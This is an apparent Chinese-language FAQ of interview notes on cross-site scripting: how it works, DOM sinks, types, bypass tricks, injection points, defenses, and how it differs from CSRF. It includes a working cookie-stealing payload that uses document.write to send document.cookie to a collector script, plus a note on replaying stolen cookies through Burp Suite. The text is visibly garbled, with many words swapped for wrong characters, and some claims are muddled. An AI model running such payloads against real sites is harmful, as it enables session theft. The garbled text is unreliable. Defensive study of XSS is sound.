XSS常见问题
-
XSS原理
web应用程序对输入和输出没有进行严厉过滤、进犯者能够刺进结构的歹意javascript脚本,当正常用户阅读网页时,被阅读器当作有用代码解析履行,盗取用户数据或履行其他歹意操作。 -
DOM型xss缝隙简单呈现的当地有哪些?
1、能够被innerHTML或outerHTML特点修正的节点:节点假如没有对输入进行恰当的转义或整理就或许存在。
2、能够刺进script标签特点的节点:如src、href、onerror、onclick等
3、console.log()
4、document.writer():运用 document.write 向页面中写入一个 img 标签, src拜访 cookie.php 并供给 cookie 参数为 document.cookie<script>document.write('<img src="http://127.0.0.1/pkxss/xcookie/cookie.php? cookie='+document.cookie+'"/>')</script>
-
XSS获取cookie后怎么使用
经过burpsuite抓包、改包、使用成功获取到的cookie值进行登录。 -
XSS缝隙的分类
反射型、存储型、DOM型
反射型和DOM型都是一次的,反射型要发送到服务器读取,DOM型数据仅在前端解析,不发送到服务器
存储型刺进到数据库,能够屡次使用,继续时间长
反射型最多 -
XSS常见的使用方法
使用XSS进行垂钓、盗取cookie信息、盗取用户身份信息进行非法操作、传达歹意代码 -
XSS常见绕过方法
大小写、双写、编码、特点、javascript伪协议、 -
XSS或许存在点?
一般涉及到数据交互的当地,服务器读取客户端提交的数据并回来读取到数据到前端HTML页面。如注册处、留言板、文章标题、谈论区、查询信息后回来前端显现
个人信息、订单信息、查找框、表单、私信、定见反应、目录 -
XSS防护
对输出编码、对输入过滤、设置白名单
对cookie值设置Httponly特点
DOM型对刺进HTML进行转义
制止外联脚本和未授权脚本
设置WAF防火墙 -
XSS与CSRF差异
XSS是使用缝隙盗取用户权限进行进犯,不需求用户登录;CSRF需求在用户登录的情况下拐骗用户点击歹意链接,凭借用户的权限完结进犯,并没有拿到用户权限。